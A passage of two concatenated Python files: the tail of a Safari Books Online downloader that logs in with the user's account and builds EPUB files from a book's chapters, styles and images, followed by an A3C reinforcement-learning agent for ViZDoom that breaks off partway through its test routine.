return False
sep = cred.index(":")
new_cred = ["", ""]
new_cred[0] = cred[:sep].strip("'").strip('"')
if "@" not in new_cred[0]:
return False
new_cred[1] = cred[sep + 1:]
return new_cred
def do_login(self, email, password):
response = self.requests_provider(self.LOGIN_ENTRY_URL)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
next_parameter = None
try:
next_parameter = parse_qs(urlparse(response.request.url).query)["next"][0]
except (AttributeError, ValueError, IndexError):
self.display.exit("Login: unable to complete login on Safari Books Online. Try again...")
redirect_uri = API_ORIGIN_URL + quote_plus(next_parameter)
response = self.requests_provider(
self.LOGIN_URL,
is_post=True,
json={
"email": email,
"password": password,
"redirect_uri": redirect_uri
},
perform_redirect=False
)
if response == 0:
self.display.exit("Login: unable to perform auth to Safari Books Online.\n Try again...")
if response.status_code != 200: # TODO To be reviewed
try:
error_page = html.fromstring(response.text)
errors_message = error_page.xpath("//ul[@class='errorlist']//li/text()")
recaptcha = error_page.xpath("//div[@class='g-recaptcha']")
messages = ([" `%s`" % error for error in errors_message
if "password" in error or "email" in error] if len(errors_message) else []) + \
([" `ReCaptcha required (wait or do logout from the website).`"] if len(
recaptcha) else [])
self.display.exit(
"Login: unable to perform auth login to Safari Books Online.\n" + self.display.SH_YELLOW +
"[*]" + self.display.SH_DEFAULT + " Details:\n" + "%s" % "\n".join(
messages if len(messages) else [" Unexpected error!"])
)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Login: your login went wrong and it encountered in an error"
" trying to parse the login details of Safari Books Online. Try again..."
)
self.jwt = response.json() # TODO: save JWT Tokens and use the refresh_token to restore user session
response = self.requests_provider(self.jwt["redirect_uri"])
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
def check_login(self):
response = self.requests_provider(PROFILE_URL, perform_redirect=False)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
elif response.status_code != 200:
self.display.exit("Authentication issue: unable to access profile page.")
elif "user_type\":\"Expired" in response.text:
self.display.exit("Authentication issue: account subscription expired.")
self.display.info("Successfully authenticated.", state=True)
def get_book_info(self):
response = self.requests_provider(self.api_url)
if response == 0:
self.display.exit("API: unable to retrieve book info.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "last_chapter_read" in response:
del response["last_chapter_read"]
for key, value in response.items():
if value is None:
response[key] = 'n/a'
return response
def get_book_chapters(self, page=1):
response = self.requests_provider(urljoin(self.api_url, "chapter/?page=%s" % page))
if response == 0:
self.display.exit("API: unable to retrieve book chapters.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "results" not in response or not len(response["results"]):
self.display.exit("API: unable to retrieve book chapters.")
if response["count"] > sys.getrecursionlimit():
sys.setrecursionlimit(response["count"])
result = []
result.extend([c for c in response["results"] if "cover" in c["filename"] or "cover" in c["title"]])
for c in result:
del response["results"][response["results"].index(c)]
result += response["results"]
return result + (self.get_book_chapters(page + 1) if response["next"] else [])
def get_default_cover(self):
response = self.requests_provider(self.book_info["cover"], stream=True)
if response == 0:
self.display.error("Error trying to retrieve the cover: %s" % self.book_info["cover"])
return False
file_ext = response.headers["Content-Type"].split("/")[-1]
with open(os.path.join(self.images_path, "default_cover." + file_ext), 'wb') as i:
for chunk in response.iter_content(1024):
i.write(chunk)
return "default_cover." + file_ext
def get_html(self, url):
response = self.requests_provider(url)
if response == 0 or response.status_code != 200:
self.display.exit(
"Crawler: error trying to retrieve this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
root = None
try:
root = html.fromstring(response.text, base_url=SAFARI_BASE_URL)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Crawler: error trying to parse this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
return root
@staticmethod
def url_is_absolute(url):
return bool(urlparse(url).netloc)
@staticmethod
def is_image_link(url: str):
return pathlib.Path(url).suffix[1:].lower() in ["jpg", "jpeg", "png", "gif"]
def link_replace(self, link):
if link and not link.startswith("mailto"):
if not self.url_is_absolute(link):
if any(x in link for x in ["cover", "images", "graphics"]) or \
self.is_image_link(link):
image = link.split("/")[-1]
return "Images/" + image
return link.replace(".html", ".xhtml")
else:
if self.book_id in link:
return self.link_replace(link.split(self.book_id)[-1])
return link
@staticmethod
def get_cover(html_root):
lowercase_ns = etree.FunctionNamespace(None)
lowercase_ns["lower-case"] = lambda _, n: n[0].lower() if n and len(n) else ""
images = html_root.xpath("//img[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover') or"
"contains(lower-case(@alt), 'cover')]")
if len(images):
return images[0]
divs = html_root.xpath("//div[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(divs):
return divs[0]
a = html_root.xpath("//a[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(a):
return a[0]
return None
def parse_html(self, root, first_page=False):
if random() > 0.8:
if len(root.xpath("//div[@class='controls']/a/text()")):
self.display.exit(self.display.api_error(" "))
book_content = root.xpath("//div[@id='sbo-rt-content']")
if not len(book_content):
self.display.exit(
"Parser: book content's corrupted or not present: %s (%s)" %
(self.filename, self.chapter_title)
)
page_css = ""
if len(self.chapter_stylesheets):
for chapter_css_url in self.chapter_stylesheets:
if chapter_css_url not in self.css:
self.css.append(chapter_css_url)
self.display.log("Crawler: found a new CSS at %s" % chapter_css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(chapter_css_url))
stylesheet_links = root.xpath("//link[@rel='stylesheet']")
if len(stylesheet_links):
for s in stylesheet_links:
css_url = urljoin("https:", s.attrib["href"]) if s.attrib["href"][:2] == "//" \
else urljoin(self.base_url, s.attrib["href"])
if css_url not in self.css:
self.css.append(css_url)
self.display.log("Crawler: found a new CSS at %s" % css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(css_url))
stylesheets = root.xpath("//style")
if len(stylesheets):
for css in stylesheets:
if "data-template" in css.attrib and len(css.attrib["data-template"]):
css.text = css.attrib["data-template"]
del css.attrib["data-template"]
try:
page_css += html.tostring(css, method="xml", encoding='unicode') + "\n"
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse one CSS found in this page: %s (%s)" %
(self.filename, self.chapter_title)
)
# TODO: add all not covered tag for `link_replace` function
svg_image_tags = root.xpath("//image")
if len(svg_image_tags):
for img in svg_image_tags:
image_attr_href = [x for x in img.attrib.keys() if "href" in x]
if len(image_attr_href):
svg_url = img.attrib.get(image_attr_href[0])
svg_root = img.getparent().getparent()
new_img = svg_root.makeelement("img")
new_img.attrib.update({"src": svg_url})
svg_root.remove(img.getparent())
svg_root.append(new_img)
book_content = book_content[0]
book_content.rewrite_links(self.link_replace)
xhtml = None
try:
if first_page:
is_cover = self.get_cover(book_content)
if is_cover is not None:
page_css = "<style>" \
"body{display:table;position:absolute;margin:0!important;height:100%;width:100%;}" \
"#Cover{display:table-cell;vertical-align:middle;text-align:center;}" \
"img{height:90vh;margin-left:auto;margin-right:auto;}" \
"</style>"
cover_html = html.fromstring("<div id=\"Cover\"></div>")
cover_div = cover_html.xpath("//div")[0]
cover_img = cover_div.makeelement("img")
cover_img.attrib.update({"src": is_cover.attrib["src"]})
cover_div.append(cover_img)
book_content = cover_html
self.cover = is_cover.attrib["src"]
xhtml = html.tostring(book_content, method="xml", encoding='unicode')
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse HTML of this page: %s (%s)" %
(self.filename, self.chapter_title)
)
return page_css, xhtml
@staticmethod
def escape_dirname(dirname, clean_space=False):
if ":" in dirname:
if dirname.index(":") > 15:
dirname = dirname.split(":")[0]
elif "win" in sys.platform:
dirname = dirname.replace(":", ",")
for ch in ['~', '#', '%', '&', '*', '{', '}', '\\', '<', '>', '?', '/', '`', '\'', '"', '|', '+', ':']:
if ch in dirname:
dirname = dirname.replace(ch, "_")
return dirname if not clean_space else dirname.replace(" ", "")
def create_dirs(self):
if os.path.isdir(self.BOOK_PATH):
self.display.log("Book directory already exists: %s" % self.BOOK_PATH)
else:
os.makedirs(self.BOOK_PATH)
oebps = os.path.join(self.BOOK_PATH, "OEBPS")
if not os.path.isdir(oebps):
self.display.book_ad_info = True
os.makedirs(oebps)
self.css_path = os.path.join(oebps, "Styles")
if os.path.isdir(self.css_path):
self.display.log("CSSs directory already exists: %s" % self.css_path)
else:
os.makedirs(self.css_path)
self.display.css_ad_info.value = 1
self.images_path = os.path.join(oebps, "Images")
if os.path.isdir(self.images_path):
self.display.log("Images directory already exists: %s" % self.images_path)
else:
os.makedirs(self.images_path)
self.display.images_ad_info.value = 1
def save_page_html(self, contents):
self.filename = self.filename.replace(".html", ".xhtml")
open(os.path.join(self.BOOK_PATH, "OEBPS", self.filename), "wb") \
.write(self.BASE_HTML.format(contents[0], contents[1]).encode("utf-8", 'xmlcharrefreplace'))
self.display.log("Created: %s" % self.filename)
def get(self):
len_books = len(self.book_chapters)
for _ in range(len_books):
if not len(self.chapters_queue):
return
first_page = len_books == len(self.chapters_queue)
next_chapter = self.chapters_queue.pop(0)
self.chapter_title = next_chapter["title"]
self.filename = next_chapter["filename"]
# Images
if "images" in next_chapter and len(next_chapter["images"]):
self.images.extend(urljoin(next_chapter['asset_base_url'], img_url)
for img_url in next_chapter['images'])
# Stylesheets
self.chapter_stylesheets = []
if "stylesheets" in next_chapter and len(next_chapter["stylesheets"]):
self.chapter_stylesheets.extend(x["url"] for x in next_chapter["stylesheets"])
if "site_styles" in next_chapter and len(next_chapter["site_styles"]):
self.chapter_stylesheets.extend(next_chapter["site_styles"])
if os.path.isfile(os.path.join(self.BOOK_PATH, "OEBPS", self.filename.replace(".html", ".xhtml"))):
if not self.display.book_ad_info and \
next_chapter not in self.book_chapters[:self.book_chapters.index(next_chapter)]:
self.display.info(
("File `%s` already exists.\n"
" If you want to download again all the book,\n"
" please delete the output directory '" + self.BOOK_PATH + "' and restart the program.")
% self.filename.replace(".html", ".xhtml")
)
self.display.book_ad_info = 2
else:
self.save_page_html(self.parse_html(self.get_html(next_chapter["content"]), first_page))
self.display.state(len_books, len_books - len(self.chapters_queue))
def _thread_download_css(self, url):
css_file = os.path.join(self.css_path, "Style{0:0>2}.css".format(self.css.index(url)))
if os.path.isfile(css_file):
if not self.display.css_ad_info.value and url not in self.css[:self.css.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the CSSs,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
css_file)
self.display.css_ad_info.value = 1
else:
response = self.requests_provider(url)
if response == 0:
self.display.error("Error trying to retrieve this CSS: %s\n From: %s" % (css_file, url))
with open(css_file, 'wb') as s:
s.write(response.content)
self.css_done_queue.put(1)
self.display.state(len(self.css), self.css_done_queue.qsize())
def _thread_download_images(self, url):
image_name = url.split("/")[-1]
image_path = os.path.join(self.images_path, image_name)
if os.path.isfile(image_path):
if not self.display.images_ad_info.value and url not in self.images[:self.images.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the images,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
image_name)
self.display.images_ad_info.value = 1
else:
response = self.requests_provider(urljoin(SAFARI_BASE_URL, url), stream=True)
if response == 0:
self.display.error("Error trying to retrieve this image: %s\n From: %s" % (image_name, url))
return
with open(image_path, 'wb') as img:
for chunk in response.iter_content(1024):
img.write(chunk)
self.images_done_queue.put(1)
self.display.state(len(self.images), self.images_done_queue.qsize())
def _start_multiprocessing(self, operation, full_queue):
if len(full_queue) > 5:
for i in range(0, len(full_queue), 5):
self._start_multiprocessing(operation, full_queue[i:i + 5])
else:
process_queue = [Process(target=operation, args=(arg,)) for arg in full_queue]
for proc in process_queue:
proc.start()
for proc in process_queue:
proc.join()
def collect_css(self):
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for css_url in self.css:
self._thread_download_css(css_url)
def collect_images(self):
if self.display.book_ad_info == 2:
self.display.info("Some of the book contents were already downloaded.\n"
" If you want to be sure that all the images will be downloaded,\n"
" please delete the output direcotry '" + self.BOOK_PATH +
"' and restart the program.")
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for image_url in self.images:
self._thread_download_images(image_url)
def create_content_opf(self):
self.css = next(os.walk(self.css_path))[2]
self.images = next(os.walk(self.images_path))[2]
manifest = []
spine = []
for c in self.book_chapters:
c["filename"] = c["filename"].replace(".html", ".xhtml")
item_id = escape("".join(c["filename"].split(".")[:-1]))
manifest.append("<item id=\"{0}\" href=\"{1}\" media-type=\"application/xhtml+xml\" />".format(
item_id, c["filename"]
))
spine.append("<itemref idref=\"{0}\"/>".format(item_id))
for i in set(self.images):
dot_split = i.split(".")
head = "img_" + escape("".join(dot_split[:-1]))
extension = dot_split[-1]
manifest.append("<item id=\"{0}\" href=\"Images/{1}\" media-type=\"image/{2}\" />".format(
head, i, "jpeg" if "jp" in extension else extension
))
for i in range(len(self.css)):
manifest.append("<item id=\"style_{0:0>2}\" href=\"Styles/Style{0:0>2}.css\" "
"media-type=\"text/css\" />".format(i))
authors = "\n".join("<dc:creator opf:file-as=\"{0}\" opf:role=\"aut\">{0}</dc:creator>".format(
escape(aut.get("name", "n/d"))
) for aut in self.book_info.get("authors", []))
subjects = "\n".join("<dc:subject>{0}</dc:subject>".format(escape(sub.get("name", "n/d")))
for sub in self.book_info.get("subjects", []))
return self.CONTENT_OPF.format(
(self.book_info.get("isbn", self.book_id)),
escape(self.book_title),
authors,
escape(self.book_info.get("description", "")),
subjects,
", ".join(escape(pub.get("name", "")) for pub in self.book_info.get("publishers", [])),
escape(self.book_info.get("rights", "")),
self.book_info.get("issued", ""),
self.cover,
"\n".join(manifest),
"\n".join(spine),
self.book_chapters[0]["filename"].replace(".html", ".xhtml")
)
@staticmethod
def parse_toc(l, c=0, mx=0):
r = ""
for cc in l:
c += 1
if int(cc["depth"]) > mx:
mx = int(cc["depth"])
r += "<navPoint id=\"{0}\" playOrder=\"{1}\">" \
"<navLabel><text>{2}</text></navLabel>" \
"<content src=\"{3}\"/>".format(
cc["fragment"] if len(cc["fragment"]) else cc["id"], c,
escape(cc["label"]), cc["href"].replace(".html", ".xhtml").split("/")[-1]
)
if cc["children"]:
sr, c, mx = SafariBooks.parse_toc(cc["children"], c, mx)
r += sr
r += "</navPoint>\n"
return r, c, mx
def create_toc(self):
response = self.requests_provider(urljoin(self.api_url, "toc/"))
if response == 0:
self.display.exit("API: unable to retrieve book chapters. "
"Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!")
response = response.json()
if not isinstance(response, list) and len(response.keys()) == 1:
self.display.exit(
self.display.api_error(response) +
" Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!"
)
navmap, _, max_depth = self.parse_toc(response)
return self.TOC_NCX.format(
(self.book_info["isbn"] if self.book_info["isbn"] else self.book_id),
max_depth,
self.book_title,
", ".join(aut["name"] for aut in self.book_info["authors"]),
navmap
)
def create_epub(self):
open(os.path.join(self.BOOK_PATH, "mimetype"), "w").write("application/epub+zip")
meta_info = os.path.join(self.BOOK_PATH, "META-INF")
if os.path.isdir(meta_info):
self.display.log("META-INF directory already exists: %s" % meta_info)
else:
os.makedirs(meta_info)
open(os.path.join(meta_info, "container.xml"), "wb").write(
self.CONTAINER_XML.encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "content.opf"), "wb").write(
self.create_content_opf().encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "toc.ncx"), "wb").write(
self.create_toc().encode("utf-8", "xmlcharrefreplace")
)
zip_file = os.path.join(PATH, "Books", self.book_id)
if os.path.isfile(zip_file + ".zip"):
os.remove(zip_file + ".zip")
shutil.make_archive(zip_file, 'zip', self.BOOK_PATH)
os.rename(zip_file + ".zip", os.path.join(self.BOOK_PATH, self.book_id) + ".epub")
# MAIN
if __name__ == "__main__":
arguments = argparse.ArgumentParser(prog="safaribooks.py",
description="Download and generate an EPUB of your favorite books"
" from Safari Books Online.",
add_help=False,
allow_abbrev=False)
login_arg_group = arguments.add_mutually_exclusive_group()
login_arg_group.add_argument(
"--cred", metavar="<EMAIL:PASS>", default=False,
help="Credentials used to perform the auth login on Safari Books Online."
" Es. ` --cred \"account_mail@mail.com:password01\" `."
)
login_arg_group.add_argument(
"--login", action='store_true',
help="Prompt for credentials used to perform the auth login on Safari Books Online."
)
arguments.add_argument(
"--no-cookies", dest="no_cookies", action='store_true',
help="Prevent your session data to be saved into `cookies.json` file."
)
arguments.add_argument(
"--kindle", dest="kindle", action='store_true',
help="Add some CSS rules that block overflow on `table` and `pre` elements."
" Use this option if you're going to export the EPUB to E-Readers like Amazon Kindle."
)
arguments.add_argument(
"--preserve-log", dest="log", action='store_true', help="Leave the `info_XXXXXXXXXXXXX.log`"
" file even if there isn't any error."
)
arguments.add_argument("--help", action="help", default=argparse.SUPPRESS, help='Show this help message.')
arguments.add_argument(
"bookid", metavar='<BOOK ID>',
help="Book digits ID that you want to download. You can find it in the URL (X-es):"
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
)
args_parsed = arguments.parse_args()
if args_parsed.cred or args_parsed.login:
user_email = ""
pre_cred = ""
if args_parsed.cred:
pre_cred = args_parsed.cred
else:
user_email = input("Email: ")
passwd = getpass.getpass("Password: ")
pre_cred = user_email + ":" + passwd
parsed_cred = SafariBooks.parse_cred(pre_cred)
if not parsed_cred:
arguments.error("invalid credential: %s" % (
args_parsed.cred if args_parsed.cred else (user_email + ":*******")
))
args_parsed.cred = parsed_cred
else:
if args_parsed.no_cookies:
arguments.error("invalid option: `--no-cookies` is valid only if you use the `--cred` option")
SafariBooks(args_parsed)
# Hint: do you want to download more then one book once, initialized more than one instance of `SafariBooks`...
sys.exit(0)
|
agent_a3c.py
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import cv2
import tensorflow as tf
import threading
import sys
import time
import os
def MakeDir(path):
try:
os.makedirs(path)
except:
pass
lab = False
load_model = False
train = True
test_display = True
test_write_video = True
path_work_dir = "~/rl_3d/"
vizdoom_path = "~/ViZDoom/"
vizdoom_scenario = vizdoom_path + "scenarios/simpler_basic.wad"
if (lab):
from env_lab import EnvLab
model_path = path_work_dir + "model_lab_a3c/"
else:
from env_vizdoom import EnvVizDoom
model_path = path_work_dir + "model_vizdoom_a3c/"
learning_rate = 0.00025
device = "/cpu:0"
num_workers = 3
t_max = 30
frame_repeat = 10 # 4
gamma = 0.99
step_num = int(2.5e5)
save_each = 0.01 * step_num
step_load = 100
entropy_beta = 0.01
grad_norm_clip = 40.0
global_scope_name = "global"
step = 0
train_scores = []
lock = threading.Lock()
start_time = 0
# Global.
env = None
MakeDir(model_path)
model_name = model_path + "a3c"
def PrintStat(elapsed_time, step, step_num, train_scores):
steps_per_s = 1.0 * step / elapsed_time
steps_per_m = 60.0 * step / elapsed_time
steps_per_h = 3600.0 * step / elapsed_time
steps_remain = step_num - step
remain_h = int(steps_remain / steps_per_h)
remain_m = int((steps_remain - remain_h * steps_per_h) / steps_per_m)
remain_s = int((steps_remain - remain_h * steps_per_h - remain_m * steps_per_m) / steps_per_s)
elapsed_h = int(elapsed_time / 3600)
elapsed_m = int((elapsed_time - elapsed_h * 3600) / 60)
elapsed_s = int((elapsed_time - elapsed_h * 3600 - elapsed_m * 60))
print("{}% | Steps: {}/{}, {:.2f}M step/h, {:02}:{:02}:{:02}/{:02}:{:02}:{:02}".format(
100.0 * step / step_num, step, step_num, steps_per_h / 1e6,
elapsed_h, elapsed_m, elapsed_s, remain_h, remain_m, remain_s), file=sys.stderr)
mean_train = 0
std_train = 0
min_train = 0
max_train = 0
if (len(train_scores) > 0):
train_scores = np.array(train_scores)
mean_train = train_scores.mean()
std_train = train_scores.std()
min_train = train_scores.min()
max_train = train_scores.max()
print("Episodes: {} Rewards: mean: {:.2f}, std: {:.2f}, min: {:.2f}, max: {:.2f}".format(
len(train_scores), mean_train, std_train, min_train, max_train), file=sys.stderr)
channels = 3
resolution = (40, 40, channels)
def Preprocess(frame):
if (channels == 1):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(frame, (resolution[1], resolution[0]))
return np.reshape(frame, resolution)
class ACNet(object):
def __init__(self, num_actions, scope, trainer):
with tf.variable_scope(scope):
self.inputs = tf.placeholder(shape=[None] + list(resolution), dtype=tf.float32)
conv1 = tf.contrib.layers.conv2d(self.inputs, num_outputs=16, kernel_size=[3, 3], stride=[2, 2])
conv2 = tf.contrib.layers.conv2d(conv1, num_outputs=32, kernel_size=[3, 3], stride=[2, 2])
conv2_flat = tf.contrib.layers.flatten(conv2)
hidden = tf.contrib.layers.fully_connected(conv2_flat, 256)
# Recurrent network for temporal dependencies
# Introduce a "fake" batch dimension of 1 after flatten so that we can do LSTM over time dim
rnn_in = tf.expand_dims(hidden, [0])
lstm_size = 256
lstm_cell = tf.contrib.rnn.BasicLSTMCell(lstm_size, state_is_tuple=True)
step_size = tf.shape(self.inputs)[:1]
c_init = np.zeros((1, lstm_cell.state_size.c), dtype=np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), dtype=np.float32)
self.state_init = [c_init, h_init]
self.rnn_state = self.state_init
c_in = tf.placeholder(shape=[1, lstm_cell.state_size.c], dtype=tf.float32)
h_in = tf.placeholder(shape=[1, lstm_cell.state_size.h], dtype=tf.float32)
self.state_in = (c_in, h_in)
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(lstm_cell, rnn_in, initial_state=state_in,
sequence_length=step_size, time_major=False)
lstm_c, lstm_h = lstm_state
rnn_out = tf.reshape(lstm_outputs, [-1, lstm_size])
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
# Output layers for policy and value estimations
self.policy = tf.contrib.layers.fully_connected(rnn_out, num_actions, activation_fn=tf.nn.softmax,
weights_initializer=self.normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = tf.contrib.layers.fully_connected(rnn_out, 1, activation_fn=None,
weights_initializer=self.normalized_columns_initializer(1.0),
biases_initializer=None)
# Only the worker network need ops for loss functions and gradient updating.
if (scope != global_scope_name):
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
actions_onehot = tf.one_hot(self.actions, num_actions, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
responsible_outputs = tf.reduce_sum(self.policy * actions_onehot, [1])
# Loss functions
value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
policy_loss = -tf.reduce_sum(tf.log(responsible_outputs) * self.advantages)
self.loss = 0.5 * value_loss + policy_loss - entropy * entropy_beta
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
if (grad_norm_clip != None):
grads, _ = tf.clip_by_global_norm(self.gradients, grad_norm_clip)
else:
grads = self.gradients
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, global_scope_name)
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
# Used to initialize weights for policy and value output layers
def normalized_columns_initializer(self, std = 1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def Train(self, sess, discounted_rewards, states, actions, advantages):
states = states / 255.0
self.ResetLstm()
feed_dict = {self.target_v : discounted_rewards,
self.inputs : np.stack(states, axis=0),
self.actions : actions,
self.advantages : advantages,
self.state_in[0] : self.rnn_state[0],
self.state_in[1] : self.rnn_state[1]}
_ = sess.run([self.apply_grads], feed_dict=feed_dict)
def ResetLstm(self):
self.rnn_state = self.state_init
def GetAction(self, sess, state):
state = state / 255.0
a_dist, v, self.rnn_state = sess.run([self.policy, self.value, self.state_out],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(a_dist == a)
return a, v[0, 0]
def GetValue(self, sess, state):
state = state / 255.0
v = sess.run([self.value],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
return v[0][0, 0]
class Worker(object):
def __init__(self, number, num_actions, trainer, model_name):
self.name = "worker_" + str(number)
self.number = number
self.model_name = model_name
# Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_ac = ACNet(num_actions, self.name, trainer)
self.update_target_graph = self.update_target(global_scope_name, self.name)
if (lab):
self.env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
self.env = EnvVizDoom(vizdoom_scenario)
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target(self, from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Calculate discounted returns.
def Discount(self, x, gamma):
for idx in reversed(xrange(len(x) - 1)):
x[idx] += x[idx + 1] * gamma
return x
def Start(self, session, saver, coord):
worker_process = lambda: self.Process(session, saver, coord)
thread = threading.Thread(target=worker_process)
thread.start()
global start_time
start_time = time.time()
return thread
def Train(self, episode_buffer, sess, bootstrap_value):
episode_buffer = np.array(episode_buffer)
states = episode_buffer[:, 0]
actions = episode_buffer[:, 1]
rewards = episode_buffer[:, 2]
values = episode_buffer[:, 3]
# Here we take the rewards and values from the episode_buffer, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = self.Discount(rewards_plus, gamma)[:-1]
value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * value_plus[1:] - value_plus[:-1]
advantages = self.Discount(advantages, gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
self.local_ac.Train(sess, discounted_rewards, states, actions, advantages)
def Process(self, sess, saver, coord):
global step, train_scores, start_time, lock
print("Starting worker " + str(self.number))
while (not coord.should_stop()):
sess.run(self.update_target_graph)
episode_buffer = []
episode_reward = 0
self.env.Reset()
s = self.env.Observation()
s = Preprocess(s)
self.local_ac.ResetLstm()
while (self.env.IsRunning()):
# Take an action using probabilities from policy network output.
a, v = self.local_ac.GetAction(sess, s)
r = self.env.Act(a, frame_repeat)
finished = not self.env.IsRunning()
if (not finished):
s1 = self.env.Observation()
s1 = Preprocess(s1)
else:
s1 = None
episode_buffer.append([s, a, r, v])
episode_reward += r
s = s1
lock.acquire()
step += 1
if (step % save_each == 0):
model_name_curr = self.model_name + "_{:04}".format(int(step / save_each))
print("\nSaving the network weigths to:", model_name_curr, file=sys.stderr)
saver.save(sess, model_name_curr)
PrintStat(time.time() - start_time, step, step_num, train_scores)
train_scores = []
if (step == step_num):
coord.request_stop()
lock.release()
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if (len(episode_buffer) == t_max or (finished and len(episode_buffer) > 0)):
# Since we don't know what the true final return is,
# we "bootstrap" from our current value estimation.
if (not finished):
v1 = self.local_ac.GetValue(sess, s)
self.Train(episode_buffer, sess, v1)
episode_buffer = []
sess.run(self.update_target_graph)
else:
self.Train(episode_buffer, sess, 0.0)
lock.acquire()
train_scores.append(episode_reward)
lock.release()
class Agent(object):
def __init__(self):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = False
config.allow_soft_placement = True
self.session = tf.Session(config=config)
with tf.device(device):
# Global network
self.global_net = ACNet(env.NumActions(), global_scope_name, None)
if (train):
trainer = tf.train.RMSPropOptimizer(learning_rate)
workers = []
for i in xrange(num_workers):
workers.append(Worker(i, env.NumActions(), trainer, model_name))
saver = tf.train.Saver(max_to_keep=100)
if (load_model):
model_name_curr = model_name + "_{:04}".format(step_load)
print("Loading model from: ", model_name_curr)
saver.restore(self.session, model_name_curr)
else:
self.session.run(tf.global_variables_initializer())
if (train):
coord = tf.train.Coordinator()
# Start the "work" process for each worker in a separate thread.
worker_threads = []
for worker in workers:
thread = worker.Start(self.session, saver, coord)
worker_threads.append(thread)
coord.join(worker_threads)
def Reset(self):
self.global_net.ResetLstm()
def Act(self, state):
action, _ = self.global_net.GetAction(self.session, state)
return action
def Test(agent):
if (test_write_video):
size = (640, 480)
fps = 30.0
fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.cv.CV_FOURCC(*'XVID')
out_video = cv2.VideoWriter(path_work_dir + "test.avi", fourcc, fps, size)
reward_total = 0
num_episodes = 30
while (num_episodes != 0):
if (not env.IsRunning()):
env.Reset()
agent.Reset()
print("Total reward: {}".format(reward_total))
reward_total = 0
